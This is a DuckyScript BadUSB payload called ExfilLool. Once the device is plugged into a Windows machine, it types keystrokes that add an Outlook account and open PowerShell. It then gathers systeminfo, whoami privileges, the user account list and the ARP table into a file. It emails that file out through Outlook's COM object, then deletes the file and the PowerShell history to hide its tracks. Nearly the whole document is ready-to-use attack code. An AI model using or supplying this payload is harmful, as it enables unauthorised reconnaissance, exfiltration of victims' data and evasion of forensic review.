REM -       wW    Ww      wW  Ww W  W   W  W       .-.        .-.           _  
REM -   wWw(O)\  /(O)  wWw(O)(O)(O)(O) (O)(O)    c(O_O)c    c(O_O)c  (OO) .' ) 
REM -   (O)_`. \/ .'   (O)_(..)   ||     ||     ,'.---.`,  ,'.---.`,  ||_/ .'  
REM -  .' __) \  /    .' __)||    | \    | \   / /|_|_|\ \/ /|_|_|\ \ |   /    
REM - (  _)   /  \   (  _) _||_   |  `.  |  `. | \_____/ || \_____/ | ||\ \    
REM -  `.__).' /\ `.  )/  (_/\_) (.-.__)(.-.__)'. `---' .`'. `---' .`(/\)\ `.  
REM -      (_.'  `._)(            `-'    `-'     `-...-'    `-...-'       `._) 
REM - by Jonmar Corpuz
REM -------------------------- 

REM - ExfilLool is used as a BadUSB exploit written in DuckyScript that's used used to fetch data from a compromised Windows system and exfiltrate that data through Outlook.
REM -------------------------- 

REM - Step 1: Add an Outlook account (If one already exists then the command won't really do anything)
REM -------------------------- 

DELAY 500
GUI r
DELAY 500
STRING outlook
DELAY 500
ENTER

DELAY 5000
ALT F
DELAY 500
RIGHT
DELAY 500
ENTER
DELAY 500
STRING <EMAIL>
DELAY 500
ENTER
DELAY 2000
STRING <EMAIL'S PASSWORD>
DELAY 500
ENTER
DELAY 2000
ENTER
DELAY 500
ALT F4
REM -------------------------- 

REM - Step 2: Open PowerShell.exe
REM -------------------------- 

DELAY 500
GUI r
DELAY 500
STRING PowerShell.exe
DELAY 500
ENTER
REM -------------------------- 

REM - Step 3: Fetch target data 
REM -------------------------- 

DELAY 2000
STRING echo 'System information:' > Oops.txt
DELAY 500
ENTER
DELAY 500
STRING systeminfo >> Oops.txt
DELAY 500 
ENTER
DELAY 500
STRING echo '' >> Oops.txt
DELAY 500
ENTER
DELAY 500
STRING echo 'Current user information:' >> Oops.txt
DELAY 500
ENTER
DELAY 700
STRING echo '' >> Oops.txt
DELAY 500
ENTER

DELAY 500
STRING whoami >> Oops.txt
DELAY 500
ENTER
DELAY 500
STRING whoami /priv >> Oops.txt
DELAY 500
ENTER
DELAY 500
STRING echo '' >> Oops.txt
DELAY 500
ENTER
DELAY 500
STRING echo 'List of users:' >> Oops.txt
DELAY 500
ENTER
DELAY 500
STRING echo '' >> Oops.txt
DELAY 500
ENTER
DELAY 500
STRING wmic useraccount list >> Oops.txt
DELAY 500
ENTER

DELAY 500
STRING echo '' >> Oops.txt
DELAY 500
ENTER
DELAY 500
STRING echo 'Network addresses:' >> Oops.txt
DELAY 500
ENTER
DELAY 500
STRING arp -a >> Oops.txt
DELAY 500
ENTER
REM -------------------------- 

REM - Step 4: Exfiltrate the generated text file containing the loot using Outlook
REM -------------------------- 

DELAY 500
STRING $Oops = pwd
DELAY 500
ENTER
DELAY 500
STRING $Oopsies = "$Oops\Oops.txt"
DELAY 500
ENTER
DELAY 500
STRING $outlook = new-object -comobject outlook.application
DELAY 500
ENTER
DELAY 500
STRING $email = $outlook.CreateItem(0)
DELAY 500
ENTER
DELAY 500
STRING $email.To = "<EMAIL>"
DELAY 500
ENTER
DELAY 500
STRING $email.Subject = "Oops"
DELAY 500
ENTER
STRING $email.Body = "Oops"
DELAY 500
ENTER
DELAY 500
STRING $email.Attachments.add($Oopsies)
DELAY 500
ENTER
DELAY 500
STRING $email.Send()
DELAY 500
ENTER
DELAY 500
STRING $outlook.Quit()
DELAY 500
ENTER
REM -------------------------- 

REM - Step 5: Erase our tracks from the compromised system
REM -------------------------- 

DELAY 500
STRING del Oops.txt
DELAY 500
ENTER

DELAY 500
STRING Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
DELAY 500
ENTER
REM -------------------------- 

REM - Check PowerShell History: Get-Content (Get-PSReadlineOption).HistorySavePath


